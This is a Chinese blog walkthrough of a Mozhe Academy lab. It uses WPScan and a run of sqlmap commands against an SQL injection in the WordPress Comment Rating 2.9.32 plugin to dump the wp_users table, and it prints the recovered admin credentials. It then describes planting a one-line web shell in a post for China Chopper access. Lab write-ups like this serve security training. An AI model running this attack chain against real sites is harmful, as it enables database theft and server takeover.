美文网首页
墨者学院-WordPress插件漏洞分析溯源

墨者学院-WordPress插件漏洞分析溯源

作者: nohands_noob | 来源:发表于2019-07-21 15:39 被阅读0次

靶场地址:
https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe

开启kali虚拟机,使用WPScan扫描漏洞
执行命令 wpscan -u 219.153.49.228:48309扫描漏洞

执行命令扫描插件漏洞wpscan -u 219.153.49.228:48309 --enumerate vp,扫描到插件漏洞,插件Comment Rating 2.9.32存在sql注入漏洞


网上查找漏洞详情,漏洞所在页面为:http://ip/wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a

交给sqlmap跑,执行 sqlmap -u "[url]"--dbs

执行sqlmap -u "[url]" -D test --tables

执行sqlmap -u "[url]" -D test -T wp_users --columns

执行sqlmap-u "[url]" -D test -T wp_users -C "user_login,user_pass" --dump --batch


后台登录地址:http://219.153.49.228:48309/wp-login.php
这里sqlmap显示出了点问题登录账号密码是 admin/12qwaszx

登录后台
在写文章处插入一句话代码,发布成功后查看文章,记录url,就可以上菜刀连接了


相关文章

网友评论

      本文标题:墨者学院-WordPress插件漏洞分析溯源

      本文链接:https://www.haomeiwen.com/subject/ljzmlctx.html